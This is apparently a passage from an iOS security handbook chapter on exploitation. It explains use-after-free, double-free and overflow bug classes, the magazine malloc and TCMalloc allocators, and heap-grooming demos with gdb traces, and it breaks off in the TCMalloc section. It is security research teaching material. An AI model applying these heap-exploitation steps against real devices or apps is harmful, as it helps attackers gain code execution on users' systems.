Search in book...
Toggle Font Controls
Create new playlist

Name your new playlist

Playlist description (optional)
Sign In

Email address

Password

Forgot Password?

or

Continue with Facebook

Continue with Google
Sign Up

Full Name

Email address

Confirm Email Address

Password

or

Continue with Facebook

Continue with Google

Chapter 7

Exploitation

The attack surface on iOS is similar to the one available on Mac OS X. Therefore, as far as userland exploitation is concerned, your focus should be tailored to client-side heap exploitation.

Note

We decided not to cover stack-related bugs because, albeit still present in some software, they are in general less likely to be exploitable and less frequent than heap-related issues.

This chapter starts by covering the common bug classes present in most client-side applications, and then digs into the notions you need to write a successful attack against them.

In modern application exploitation, it is vital to fully understand how the allocator used by the application works and how to control it as precisely as possible. In this chapter you learn about the iOS system allocator and the techniques you can use to control its layout.

One of the most frequently hit targets is the web browser. MobileSafari uses TCMalloc instead of the system allocator, so this chapter also dissects how it works and how to leverage its internals to improve an exploit's reliability.

Finally, an example of a client-side exploit, Pwn2own 2010 MobileSafari, is analyzed to demonstrate how the techniques described in this chapter are applied in real life.

Exploiting Bug Classes

Depending on the targeted software, the types of vulnerabilities present in it vary wildly. For instance, when it comes to browsers it is very likely that the bug classes you will be dealing with are object lifetime issues, including use-after-free and double-free bugs, among others. If, instead, the target is a binary format parser (such as a PDF reader), the bug classes are most likely arithmetic issues or overflows.

This section briefly describes the strategies applied most frequently to exploit bugs belonging to the bug classes discussed earlier, so that you will be able to grasp which details of the allocator's behavior are relevant for each bug class.

Object Lifetime Vulnerabilities

Object lifetime issues, such as use-after-free and double-free bugs, are often present in software when an attacker has a lot of control (for example, through JavaScript) of the behavior of the application.

Use-after-free bugs usually exist when an object is deallocated but then used again in a code path. Such bugs tend to be present when the management of an object life span is far from obvious, which is one of the reasons why browsers are the perfect playground for them. Figure 7.1 shows the characteristics of these types of bugs.

Figure 7.1 Typical of use-after-free scenario

In general, the strategy for exploiting these vulnerabilities is pretty straightforward:

1. Forcefully free the vulnerable object.

2. Replace the object with one whose content you control.

3. Trigger the usage of the object to gain code execution.

Often the easiest way for an attacker to execute code is to replace the virtual table pointer of the object with an address under his control; this way, whenever an indirect call is made, the execution can be hijacked.

Double-frees are vulnerabilities that happen when an object is deallocated more than once during its life span. The exploitation of double-free can come in different shapes and flavors, but most of the time it can be considered a subcase of a use-after-free bug. The first strategy for turning a double-free into a use-after-free is the following:

1. After the vulnerable object is deallocated once, replace the object with a legitimate one.

The newly created object is freed again as part of the double-free vulnerability.

2. Replace the newly created object with one whose content you control.

3. Trigger the usage of the object to gain code execution.

The second strategy is to inspect all the code paths taken when the vulnerable object is freed, and determine whether it is possible to hijack the execution by controlling its content with specifically crafted data. For instance, if an indirect call (either of the object itself or of a member of the object) is triggered in the object destructor, an attacker can take over the application in pretty much the same fashion used for use-after-free bugs.

It should be clear by now that you have a lot of allocation-deallocation gimmicks to learn in order to exploit these vulnerabilities. In fact, the focus with these kinds of vulnerabilities is more on the functioning of an allocator than possible weaknesses in handling memory blocks.

In the next section you see some bug classes that require more focus on the latter than the former.

Arithmetic and Overflow Vulnerabilities These vulnerabilities usually allow an attacker to overwrite four or more bytes at more or less arbitrary locations. Whether an integer overflow occurs and allows an attacker to write past the size of a buffer, or allows the attacker to allocate a smaller-than-needed buffer, or the attacker ends up having the chance to write to a buffer that is smaller than intended, what she needs is a reliable way to control the heap layout to be able to overwrite interesting data.

Especially in the past, the strategy was usually to overwrite heap metadata so that when an element of a linked list was unlinked, an attacker could overwrite an arbitrary memory location. Nowadays, it is more common to overwrite application-specific data, because the heap normally checks the consistency of its data structures. Overwriting application-specific data often requires making sure that the buffer you are overflowing sits close to the one that needs to be overwritten. Later in this chapter you learn to perform all those operations with some simple techniques that can work in most scenarios.

Understanding the iOS System Allocator

The iOS system allocator is called magazine malloc. To study the allocator implementation, refer to the Mac OS X allocator (whose implementation is located in magazine_malloc.c in the Libc source code for Mac OS X).

Although some research has been done on the previous version of the Mac OS X allocator, there is a general lack of information on magazine malloc exploitation. The best available research on the topic was covered by Dino Dai Zovi and Charlie Miller in The Mac Hackers Handbook (Wiley Publishing: 978-0-470-39536-3) and in a few other white papers.

This section covers the notions you need to create an exploit for the iOS allocator.

Regions

Magazine malloc uses the concept of regions to perform allocations. Specifically, the heap is divided into three regions:

Tiny (less than 496 bytes)
Small (more than 496 but less than 15360 bytes)
Large (anything else above 15360 bytes)

Each region consists of an array of memory blocks (known as quanta) and metadata to determine which quanta are used and which ones are free. Each region differs slightly from the others based on two factors — region and quantum size:

Tiny is 1MB large and uses 16 bytes quanta.
Small is 8MB and uses 512 bytes quanta.
Large varies in size and has no quanta.

The allocator maintains 32 freelists for tiny and small regions. The freelists from 1 to 31 are used for allocations, and the last freelist is used for blocks that are coalesced after two or more objects close to each other are freed.

The main difference between magazine malloc and the previous allocator on iOS is that magazine malloc maintains separate regions for each CPU present on the system. This allows the allocator to scale much better than the previous one. This chapter does not take this difference into account because only the new iPhone 4S and iPad 2 are dual-core; the other Apple products running iOS have only one CPU.

Allocation

When an allocation is required, magazine malloc first decides which region is the appropriate one based on the requested size. The behavior for tiny and small regions is identical, whereas for large allocations the process is slightly different. This section walks through the process for tiny and large regions, which gives a complete overview of how the allocation process works.

Every time a memory block is deallocated, magazine malloc keeps a reference to it in a dedicated structure member called mag_last_free. If a new allocation has a requested size that is the same as the one in the mag_last_free memory block, this is returned to the caller and the pointer is set to NULL.

If the size differs, magazine malloc starts looking in the freelists for the specific region for an exact size match. If this attempt is unsuccessful, the last freelist is examined; this freelist, as mentioned before, is used to store larger memory blocks that were coalesced.

If the last freelist is not empty, a memory block from there is split into two parts: one to be returned to the caller and one to be put back on the freelist itself.

If all the preceding attempts failed and no suitable memory regions are allocated, magazine malloc allocates a new memory block using mmap() and assigns it to the appropriate region type. This process is carried out by the thread whose request for allocation could not be satisfied.

For large objects the process is more straightforward. Instead of maintaining 32 freelists, large objects have a cache that contains all the available entries. Therefore, the allocator first looks for already allocated memory pages of the correct size. If none can be found, it searches for bigger memory blocks and splits them so that one half can fulfill the request and the other is pushed back to the list of available ones.

Finally, if no memory regions are available, an allocation using mmap() is performed.

Deallocation

The same distinction made for allocations in terms of regions holds true for deallocations as well. As a result, deallocation is covered only for tiny memory objects and large memory objects.

When a tiny object is freed, the allocator puts it in the region cache, that is, mag_last_free.

The memory area that was previously there is moved to the appropriate free-list following three steps. First the allocator checks whether the object can be coalesced with the previous one, then it verifies if it can be coalesced with the following one. Depending on whether any of the coalescing operations were successful, the object is placed accordingly.

If the size of the object after coalescing it is bigger than the appropriate sizes for the tiny region, the object is placed in the last freelist (recalling from the Allocation section, this is the region where objects bigger than expected for a given region are placed).

When a tiny region contains only freed blocks, the whole region is released to the system.

The procedure is slightly different for large objects. If the object is larger than a certain threshold, the object is released immediately to the system. Otherwise, in a similar fashion to tiny and small, the object is placed in a dedicated position called large_entry_cache_newest.

The object that was in the most recent position is moved to the large object cache if there is enough space — that is, if the number of entries in the cache doesn't exceed the maximum number of elements allowed to be placed there. The size of the cache is architecture- and OS-dependent.

If the cache exceeds the size, the object is deallocated without being placed in the cache. Likewise, if after placing the object in the cache, the cache size grows too big, the oldest object in the cache is deleted.

Taming the iOS Allocator

In this section you walk through a number of examples that allow you to better understand the internals of the allocator and how to use it for your own purposes in the context of exploitation.

Most often you will work directly on the device. The main reason for this choice is that magazine malloc keeps per-CPU caches of tiny and small regions; therefore, the behavior on an Intel machine might be too imprecise compared to the iPhone. Nonetheless, when debugging real-world exploits it might be desirable to work from a virtual machine running Mac OS X, which is as close as possible to an iPhone in terms of available RAM and number of CPUs. Another viable and easier option is to use a jailbroken phone; this grants access to gdb and a number of other tools.

Tools of the Trade

A number of tools exist to assist in debugging heap-related issues on Mac OS X; unfortunately, only a small percentage of those are available on non-jailbroken iPhones.

This section talks about all the available tools both on OS X and iOS, specifying which ones are available on both platforms and which are available only on OS X.

A number of environment variables exist to ease the task of debugging. The most important ones are listed here:

MallocScribble—Fills freed memory with 0x55
MallocPreScribble—Fills uninitialized memory with 0xAA
MallocStackLogging—Records the full history and stack logging of a memory block (the results can be inspected using malloc_history)

These environment variables can be used both on Mac OS X and iOS.

Another tool useful for determining the types of bugs you are dealing with is crashwrangler. When an application crashes, it tells the reason of the crash and whether or not it appears to be exploitable. In general, crashwrangler is not really good at predicting exploitability, but nonetheless understanding why the application crashed can be pretty useful.

Finally, you can use Dtrace to inspect allocations and deallocations of memory blocks on the system allocator. The Mac Hacker's Handbook shows a number of Dtrace scripts that can be handy for debugging purposes.

Both Dtrace and crashwrangler are available only for Mac OS X.

Learning Alloc/Dealloc Basics

Note

Find code for this chapter at our book's website at. www.wiley.com/go/ioshackershandbook.

One of the easiest ways to exploit an arithmetic bug in the past was to overwrite heap-metadata information. This is not possible anymore with magazine malloc. Every time an object is deallocated, its integrity is verified by the following function:

static INLINE void *
free_list_unchecksum_ptr(szone_t *szone, ptr_union *ptr)
{
    ptr_union p;
    uintptr_t t = ptr->u;

    t = (t << NYBBLE) | (t >> ANTI_NYBBLE); // compiles to rotate instruction
    p.u = t &  ∼(uintptr_t)0xF;

    if ((t & (uintptr_t)0xF) != free_list_gen_checksum(p.u ˆ szone->cookie))
    {
      free_list_checksum_botch(szone, (free_list_t *)ptr);
      return NULL;
    }
    return p.p;
}

Specifically, when an object is deallocated, the previous and next elements of its heap metadata are verified by XORing them with a randomly generated cookie. The result of the XOR is placed in the high four bits of each pointer.

Metadata of objects allocated in the large region are not verified. Nonetheless the metadata for those objects are stored separately, and therefore classic attacks against large objects are not feasible either.

Unless an attacker is capable of reading the cookie that is used to verify heap metadata, the only option left is to overwrite application-specific data. For this reason you should try to become familiar with common operations that can be used during exploitation.

It is clear that the ability of an attacker to place memory objects close to each other in memory is pretty important to reliably overwrite application-specific data.

To understand better how to control the heap layout, start with a simple example that illustrates the way objects are allocated and freed. Run this small application on a test device running iOS:

#define DebugBreak() 
do { 
_asm_("mov r0, #20
mov ip, r0
svc 128
mov r1, #37
mov ip, r1
mov r1,
#2
mov r2, #1
 svc 128
" 
: : : "memory","ip","r0","r1","r2"); 
} while (0)

int main(int argc, char *argv[])
{
    unsigned long *ptr1, *ptr2, *ptr3, *ptr4;
    ptr1 = malloc(24);
    ptr2 = malloc(24);
    ptr3 = malloc(24);
    ptr4 = malloc(24);
   
    memset(ptr1, 0xaa, 24);
    memset(ptr2, 0xbb, 24);
    memset(ptr3, 0xcc, 24);
    DebugBreak();
   
    free(ptr1);
    DebugBreak();
    free(ptr3);
    DebugBreak();
    free(ptr2);
    DebugBreak();
    free(ptr4);
    DebugBreak();
   
    @autoreleasepool {
        return UIApplicationMain(argc, argv, nil, NSStringFromClass
([bookAppDelegate class]));
    }
}

The application first allocates four buffers in the tiny region and then starts to free them one by one. We use a macro to cause a software breakpoint so that Xcode will automatically break into gdb for us while running the application on the test device.

At the first breakpoint the buffers have been allocated and placed in memory:

GNU gdb 6.3.50-20050815 (Apple version gdb-1708) (Fri Aug 26 04:12:03 UTC 2011)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "--host=i386-apple-darwin
--target=arm-apple-darwin".tty /dev/ttys002
target remote-mobile /tmp/.XcodeGDBRemote-1923-40
Switching to remote-macosx protocol
mem 0x1000 0x3fffffff cache
mem 0x40000000 0xffffffff none
mem 0x00000000 0x0fff none
[Switching to process 7171 thread 0x1c03]
[Switching to process 7171 thread 0x1c03]
sharedlibrary apply-load-rules all
Current language:  auto; currently objective-c
(gdb) x/40x ptr1
0x14fa50:     0xaaaaaaaa   0xaaaaaaaa   0xaaaaaaaa   0xaaaaaaaa
0x14fa60:     0xaaaaaaaa   0xaaaaaaaa   0x00000000   0x00000000
0x14fa70:     0xbbbbbbbb   0xbbbbbbbb   0xbbbbbbbb   0xbbbbbbbb
0x14fa80:     0xbbbbbbbb   0xbbbbbbbb   0x00000000   0x00000000
0x14fa90:     0xcccccccc   0xcccccccc   0xcccccccc   0xcccccccc
0x14faa0:     0xcccccccc   0xcccccccc   0x00000000   0x00000000
0x14fab0:     0x00000000   0x00000000   0x00000000   0x00000000
0x14fac0:     0x00000000   0x00000000   0x00000000   0x00000000
0x14fad0:     0x7665442f   0x706f6c65   0x752f7265   0x6c2f7273
0x14fae0:     0x6c2f6269   0x63586269   0x4465646f   0x67756265
(gdb) c
Continuing.

Next the first object is freed:

Program received signal SIGINT, Interrupt.
main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest/
booktest/main.m:34
34    free(ptr3);
(gdb) x/40x ptr1
0x14fa50:     0xaaaaaaaa   0xaaaaaaaa   0xaaaaaaaa     0xaaaaaaaa
0x14fa60:     0xaaaaaaaa   0xaaaaaaaa   0x00000000     0x00000000
0x14fa70:     0xbbbbbbbb   0xbbbbbbbb   0xbbbbbbbb     0xbbbbbbbb
0x14fa80:     0xbbbbbbbb   0xbbbbbbbb   0x00000000     0x00000000
0x14fa90:     0xcccccccc   0xcccccccc   0xcccccccc     0xcccccccc
0x14faa0:     0xcccccccc   0xcccccccc   0x00000000     0x00000000
0x14fab0:     0x00000000   0x00000000   0x00000000     0x00000000
0x14fac0:     0x00000000   0x00000000   0x00000000     0x00000000
0x14fad0:     0x7665442f   0x706f6c65   0x752f7265     0x6c2f7273
0x14fae0:     0x6c2f6269   0x63586269   0x4465646f     0x67756265
(gdb) c
Continuing.

Nothing in memory layout has changed, and this is in line with what we have explained before. In fact, at this point only ptr1 was freed and it was placed accordingly in the mag_last_free cache. Going further:

main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest
/booktest/main.m:36
36         free(ptr2);
(gdb) x/40x ptr1
0x14fa50:     0x90000000   0x90000000   0xaaaa0002     0xaaaaaaaa
0x14fa60:     0xaaaaaaaa   0xaaaaaaaa   0x00000000     0x00020000
0x14fa70:     0xbbbbbbbb   0xbbbbbbbb   0xbbbbbbbb     0xbbbbbbbb
0x14fa80:     0xbbbbbbbb   0xbbbbbbbb   0x00000000     0x00000000
0x14fa90:     0xcccccccc   0xcccccccc   0xcccccccc     0xcccccccc
0x14faa0:     0xcccccccc   0xcccccccc   0x00000000     0x00000000
0x14fab0:     0x00000000   0x00000000   0x00000000     0x00000000
0x14fac0:     0x00000000   0x00000000   0x00000000     0x00000000
0x14fad0:     0x7665442f   0x706f6c65   0x752f7265     0x6c2f7273
0x14fae0:     0x6c2f6269   0x63586269   0x4465646f     0x67756265
(gdb) c
Continuing.

Now ptr3 was freed as well; therefore, ptr1 had to be taken off the mag_last_free cache and was actually placed on the freelist. The first two dwords represent the previous and the next pointer in the freelist. Remembering that pointers are XORed with a randomly generated cookie, you can easily gather that both of them are NULL; in fact, the freelist was previously empty. The next object to be freed is ptr2:

Program received signal SIGINT, Interrupt.
main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest
/booktest/main.m:38
38        free(ptr4);
(gdb) x/40x ptr1
0x14fa50:     0x70014fa9   0x90000000   0xaaaa0002   0xaaaaaaaa
0x14fa60:     0xaaaaaaaa   0xaaaaaaaa   0x00000000   0x00020000
0x14fa70:     0xbbbbbbbb   0xbbbbbbbb   0xbbbbbbbb   0xbbbbbbbb
0x14fa80:     0xbbbbbbbb   0xbbbbbbbb   0x00000000   0x00000000
0x14fa90:     0x90000000   0x70014fa5   0xcccc0002   0xcccccccc
0x14faa0:     0xcccccccc   0xcccccccc   0x00000000   0x00020000
0x14fab0:     0x00000000   0x00000000   0x00000000   0x00000000
0x14fac0:     0x00000000   0x00000000   0x00000000   0x00000000
0x14fad0:     0x7665442f   0x706f6c65   0x752f7265   0x6c2f7273
0x14fae0:     0x6c2f6269   0x63586269   0x4465646f   0x67756265
(gdb) c
Continuing.

Things have changed slightly. Now ptr2 is in the mag_last_free cache and both ptr1 and ptr3 are on the freelist. Moreover, the previous pointer for ptr1 now points to ptr3, whereas the next pointer for ptr3 points to ptr1. Finally, see what happens when ptr4 is placed in the mag_last_free cache:

Program received signal SIGINT, Interrupt.
0x00002400 in main (argc=1, argv=0x2fdffbac) at
/Users/snagg/Documents/Book/booktest/booktest/main.m:39
39     DebugBreak();
(gdb) x/40x ptr1
0x14fa50:     0x90000000   0x90000000   0xaaaa0006   0xaaaaaaaa
0x14fa60:     0xaaaaaaaa   0xaaaaaaaa   0x00000000   0x00020000
0x14fa70:     0xbbbbbbbb   0xbbbbbbbb   0xbbbbbbbb   0xbbbbbbbb
0x14fa80:     0xbbbbbbbb   0xbbbbbbbb   0x00000000   0x00000000
0x14fa90:     0x90000000   0x90000000   0xcccc0002   0xcccccccc
0x14faa0:     0xcccccccc   0xcccccccc   0x00000000   0x00060000
0x14fab0:     0x00000000   0x00000000   0x00000000   0x00000000
0x14fac0:     0x00000000   0x00000000   0x00000000   0x00000000
0x14fad0:     0x7665442f   0x706f6c65   0x752f7265   0x6c2f7273
0x14fae0:     0x6c2f6269   0x63586269   0x4465646f   0x67756265
(gdb)

The content of ptr2 seems unchanged, but other things are different. First, both previous and next pointers for ptr1 and ptr3 are set to NULL, and also the size of the ptr1 block has changed. ptr1 in fact is now 96 bytes long (0x0006*16 bytes, which is the quanta size for the tiny block). This means that ptr1, ptr2, and ptr3 were all coalesced in one block that was placed on the freelist of a different quantum (0x0006), which has no other elements. Therefore, both the previous and the next pointers are freed. The freelist for 0x0002 is now empty.

Exploiting Arithmetic Vulnerabilities

The previous example cleared once and for all the idea of being able to overwrite heap metadata to achieve code execution. Therefore, the only available option is to allocate objects in a way that allows the vulnerable object to be placed next to one to overwrite. This technique is called Heap Feng Shui. Later in this chapter, you learn its basics and use it in the context of a browser. For now, you will limit yourself to a simple plan:

1. Allocate a bunch of vulnerable objects.

2. Create holes in between them.

3. Allocate “interesting” objects in the holes.

To accomplish this goal you can use the following simple application. It first allocates 50 objects and sets their content to 0xcc. Then half of them will be freed, and finally 10 objects filled with 0xaa will be allocated:

#define DebugBreak() 
do { 
_asm_("mov r0, #20
mov ip, r0
svc 128
mov r1, #37
mov ip, r1
mov
r1, #2
mov r2,
 #1
 svc 128
"
: : : "memory","ip","r0","r1","r2"); 
} while (0)

int main(int argc, char *argv[])
{
    unsigned long *buggy[50];
    unsigned long *interesting[10];
    int i;
   
    for(i = 0; i < 50; i++) {
        buggy[i] = malloc(48);
        memset(buggy[i], 0xcc, 48);
    }
    DebugBreak();
   
    for(i = 49; i > 0; i -=2)
        free(buggy[i]);
   
    DebugBreak();
   
    for(i = 0; i < 10; i++) {
        interesting[i] = malloc(48);
        memset(interesting[i], 0xaa, 48);
    }
   
    DebugBreak();
   
    @autoreleasepool {
        return UIApplicationMain(argc, argv, nil, NSStringFromClass
([bookAppDelegate class]));
    }
}

You start by running the application:

GNU gdb 6.3.50-20050815 (Apple version gdb-1708) (Fri Aug 26 04:12:03 UTC 2011)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "--host=i386-apple-darwin
--target=arm-apple-darwin".tty /dev/ttys002
target remote-mobile /tmp/.XcodeGDBRemote-1923-73
Switching to remote-macosx protocol
mem 0x1000 0x3fffffff cache
mem 0x40000000 0xffffffff none
mem 0x00000000 0x0fff none
[Switching to process 7171 thread 0x1c03]
[Switching to process 7171 thread 0x1c03]
sharedlibrary apply-load-rules all
Current language:  auto; currently objective-c
(gdb) x/50x buggy
0x2fdffacc:   0x0017ca50   0x0017ca80   0x0017cab0   0x0017cae0
0x2fdffadc:   0x0017cb10   0x0017cb40   0x0017cb70   0x0017cba0
0x2fdffaec:   0x0017cbd0   0x0017cc00   0x0017cc30   0x0017cc60
0x2fdffafc:   0x0017cc90   0x0017ccc0   0x0017ccf0   0x0017cd20
0x2fdffb0c:   0x0017cd50   0x0017cd80   0x0017cdb0   0x0017cde0
0x2fdffb1c:   0x0017ce10   0x0017ce40   0x0017ce70   0x0017cea0
0x2fdffb2c:   0x0017ced0   0x0017cf00   0x0017cf30   0x0017cf60
0x2fdffb3c:   0x0017cf90   0x0017cfc0   0x0017cff0   0x0017d020
0x2fdffb4c:   0x0017d050   0x0017d080   0x0017d0b0   0x0017d0e0
0x2fdffb5c:   0x0017d110   0x0017d140   0x0017d170   0x0017d1a0
0x2fdffb6c:   0x0017d1d0   0x0017d200   0x0017d230   0x0017d260
0x2fdffb7c:   0x0017d290   0x0017d2c0   0x0017d2f0   0x0017d320
0x2fdffb8c:   0x0017d350   0x0017d380
(gdb) x/15x 0x0017ca80
0x17ca80:     0xcccccccc   0xcccccccc   0xcccccccc   0xcccccccc
0x17ca90:     0xcccccccc   0xcccccccc   0xcccccccc   0xcccccccc
0x17caa0:     0xcccccccc   0xcccccccc   0xcccccccc   0xcccccccc
0x17cab0:     0xcccccccc   0xcccccccc   0xcccccccc
(gdb) c
Continuing.

All of the 50 objects were allocated, and each one of them is filled with 0xcc, as expected. Going on further you can see the status of the application after 25 objects are freed:

Program received signal SIGINT, Interrupt.
0x0000235a in main (argc=1, argv=0x2fdffbac) at
/Users/snagg/Documents/Book/booktest/booktest/main.m:34
34        DebugBreak();
(gdb) x/15x 0x0017cae0
0x17cae0:     0xa0000000   0xe0017cb4   0xcccc0003   0xcccccccc
0x17caf0:     0xcccccccc   0xcccccccc   0xcccccccc   0xcccccccc
0x17cb00:     0xcccccccc   0xcccccccc   0xcccccccc   0x0003cccc
0x17cb10:     0xcccccccc   0xcccccccc   0xcccccccc
(gdb) c
Continuing.

The fourth object is one of those that were freed, specifically; it is the last one added to the freelist (in fact, the first object is stored in the mag_last_free cache instead). Its previous pointer is set to NULL and the next pointer is set to the sixth object in the buggy array. Finally, you allocate the objects you are interested in:

Program received signal SIGINT, Interrupt.
0x000023fe in main (argc=1, argv=0x2fdffbac) at
/Users/snagg/Documents/Book/booktest/booktest/main.m:41
41        DebugBreak();
(gdb) x/10x interesting
0x2fdffaa4:   0x0017ca80   0x0017cae0   0x0017cb40   0x0017cba0
0x2fdffab4:   0x0017cc00   0x0017cc60   0x0017ccc0   0x0017cd20
0x2fdffac4:   0x0017cd80   0x0017cde0
(gdb) x/15x 0x0017ca80
0x17ca80:     0xaaaaaaaa   0xaaaaaaaa   0xaaaaaaaa   0xaaaaaaaa
0x17ca90:     0xaaaaaaaa   0xaaaaaaaa   0xaaaaaaaa   0xaaaaaaaa
0x17caa0:     0xaaaaaaaa   0xaaaaaaaa   0xaaaaaaaa   0xaaaaaaaa
0x17cab0:     0xcccccccc   0xcccccccc   0xcccccccc

All the 10 replaced objects were previously freed and their content is filled with 0xaa as expected. In the output, you see the content of the first object of buggy, whose content you have seen before.

In a real-life application, the same technique can be applied, although some difficulties arise. Specifically, the heap state at the beginning of the exploit will be unknown and far from “ideal,” and the attacker might not have enough room to allocate as many objects as she wishes. Nonetheless, often this technique proves to be pretty useful and applicable. Later in this chapter when describing TCMalloc, you learn how to apply it to MobileSafari.

Exploiting Object Lifetime Issues

When dealing with object lifetime issues it is very important to be able to replace the vulnerable object in memory. This can become tricky when memory blocks are coalesced; in fact, in that case, the object size can change in more or less unpredictable ways. In general, you have three ways to overcome this problem:

Replace the object right after the vulnerable one was freed.
Place the object in between allocated objects.
Place the object in between objects whose size you control.

With the first strategy the object will be fetched directly from the mag_last_free cache, and therefore no coalescence can take place. The second case makes sure that the next and the previous objects are not freed, again ensuring coalescence is not possible. The last case allows you to predict the size of the final object that will be coalesced, and thus be able to allocate a proper replacement object. To use the first or the second technique, you can use the examples previously shown in this chapter; you can try out the last technique with this simple application:

#define DebugBreak() 
do { 
_asm_("mov r0, #20
mov ip, r0
svc 128
mov r1, #37
mov ip,
r1
mov r1, #2
mov r2, #1
 svc 128
" 
: : : "memory","ip","r0","r1","r2"); 
} while (0)

int main(int argc, char *argv[])
{
    unsigned long *ptr1, *ptr2, *ptr3, *ptr4;
    unsigned long *replacement;
   
    ptr1 = malloc(48);
    ptr2 = malloc(64);
    ptr3 = malloc(80);
    ptr4 = malloc(24);
    DebugBreak();
   
    free(ptr1);
    free(ptr2);
    free(ptr3);
    free(ptr4);
    DebugBreak();
   
    replacement = malloc(192);
   
    DebugBreak();
   
   
    @autoreleasepool {
        return UIApplicationMain(argc, argv, nil, NSStringFromClass
([bookAppDelegate class]));
    }
}

The application allocates four objects, each one of them a different size. The goal is to replace ptr2. To do this you take into account blocks coalescence, and therefore the replacement object will be 192 bytes instead of 64 bytes. Running the application verifies this:

GNU gdb 6.3.50-20050815 (Apple version gdb-1708) (Fri Aug 26 04:12:03 UTC 2011)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "--host=i386-apple-darwin --target=arm-apple-darwin".
tty /dev/ttys002
target remote-mobile /tmp/.XcodeGDBRemote-1923-41
Switching to remote-macosx protocol
mem 0x1000 0x3fffffff cache
mem 0x40000000 0xffffffff none
mem 0x00000000 0x0fff none
[Switching to process 7171 thread 0x1c03]
[Switching to process 7171 thread 0x1c03]
sharedlibrary apply-load-rules all
Current language:  auto; currently objective-c
(gdb) x/x ptr1
0x170760:    0x00000000
(gdb) c
Continuing.

ptr1 is allocated at 0x170760. Continuing the execution, you examine its content after all the pointers are freed:

Program received signal SIGINT, Interrupt.
0x0000240e in main (argc=1, argv=0x2fdffbac) at
/Users/snagg/Documents/Book/booktest/booktest/main.m:34
34        DebugBreak();
(gdb) x/4x ptr1
0x170760:     0x20000000   0x20000000   0x0000000c   0x00000000
(gdb) c
Continuing.

ptr1 was assigned to quantum 0x000c, which corresponds to 192 bytes. It appears you are on the right track. Finally, the application allocates the replacement object:

Program received signal SIGINT, Interrupt.
0x00002432 in main (argc=1, argv=0x2fdffbac) at
/Users/snagg/Documents/Book/booktest/booktest/main.m:38
38       DebugBreak();
(gdb) x/x replacement
0x170760:   0x20000000
(gdb)

The replacement object is correctly placed where ptr1 used to be in memory. ptr2 has been successfully replaced regardless of block coalescence.

The next section examines a different allocator used by a number of applications, including MobileSafari.

Understanding TCMalloc

TCMalloc is an allocator originally conceived by Sanjay Ghemawat, and it is meant to be as fast as possible in multi-threaded applications. As a matter of fact, the whole structure of the allocator reduces thread interaction and locking to a bare minimum.

TCMalloc is of great interest for us because it is the allocator of choice for WebKit. In this section you delve into it to understand how it works and how you can leverage it to your needs as attackers.

TCMalloc has two different mechanisms for dealing with large and small allocations. The former are managed by the so-called Pageheap and are directly relayed to the underlying OS allocator, which was already discussed, whereas the latter are handled entirely by TCMalloc.

Large Object Allocation and Deallocation

Whenever an allocation for an object that is bigger than a user-defined threshold, kMaxSize, is requested, the page-level allocator is used. The page-level allocator, Pageheap, allocates spans, that is, a set of contiguous pages of memory.

The procedure starts by looking in the double-linked list of spans already allocated to see whether any of the correct size are available to TCMalloc. In the double-linked list are two types of spans: ones that are available for use and ones that were deallocated by TCMalloc but have yet to be returned to the underlying system heap.

If a deallocated span is available, it is first reallocated and then returned. If, instead, the span is available and not marked deallocated, it is simply returned. If no spans of the correct size are available, the page-level allocator tries to locate a bigger span that is “good enough” for the role; that is, a span that is as close as possible to the requested size. Once it has found such a span, it splits the span so that the rest of the memory can be used later and returns a span of the correct size.

If no suitable spans are available, a new set of pages is requested to the underlying OS and split into two memory objects: one of the requested size and another one of the allocated size minus the amount of memory needed by the requested allocation.

When a span is not needed anymore, it is first coalesced with either the preceding span, the next span, or both, and then it is marked as free. Finally, the span is returned to the system by the garbage collector depending on a number of user-defined parameters, specifically, once the number of freed spans is greater than targetPageCount.

Small Object Allocation

The mechanism used for allocating small objects is pretty convoluted. Each running thread has its own dedicated object cache and freelist. A freelist is a double-linked list that is divided into allocation classes. The class for objects that are smaller than 1024 bytes is computed as follows: (object_size + 7)/8.

For objects that are bigger than that, they are 128 bytes aligned and the class is computed this way: (object_size + 127 + (120<<7))/128.

In addition to the per-thread cache, a central cache exists. The central cache is shared by all threads and has the same structure of the thread cache.

When a new allocation is requested, the allocator first retrieves the thread cache for the current thread and looks into the thread freelist to verify whether any slots are available for the correct allocation class. If this fails, the allocator looks inside the central cache and retrieves an object from there. For performance purposes, if the thread cache is forced to ask the central cache for available objects instead of just transferring one object in the thread-cache, a whole range of objects is fetched.

In the scenario where both the thread cache and the central cache have no objects of the correct allocation class, those objects are fetched directly from the spans by following the procedure explained for large objects.

Small Object Deallocation

When a small object is deallocated, it is returned to the thread cache freelist. If the freelist exceeds a user-defined parameter, a garbage collection occurs.

The garbage collector then returns the unused objects from the thread cache freelist to the central cache freelist. Because all the objects in the central cache come from spans, whenever a new set of objects is reassigned to the central freelist, the allocator verifies whether the span the object belongs to is completely free or not. If it is, the span is marked as deallocated and will eventually be returned to the system, as explained before for large object allocation.

Taming TCMalloc

This section dissects TCMalloc techniques used to control the heap layout so that it becomes as predictable as possible. Specifically, it explains what steps are needed to exploit an object lifetime issue and talks about a technique called Heap Feng Shui. The technique was discussed publically for the first time by Alex Sotirov, and in that case it was tailored to IE specifically to exploit heap overflows in IE. Nonetheless, the same concepts can be applied to pretty much every heap implementation available on the market.

Obtaining a Predictable Heap Layout

To obtain a predictable heap layout, the first thing you need to do is find an effective way to trigger the garbage collector. This is particularly important in the case of object lifetime issues because, most of the time, the objects aren't actually freed until a garbage collection occurs. The most obvious way of triggering the garbage collector is to use JavaScript. This, however, means that the techniques used are JavaScript-engine–dependent.

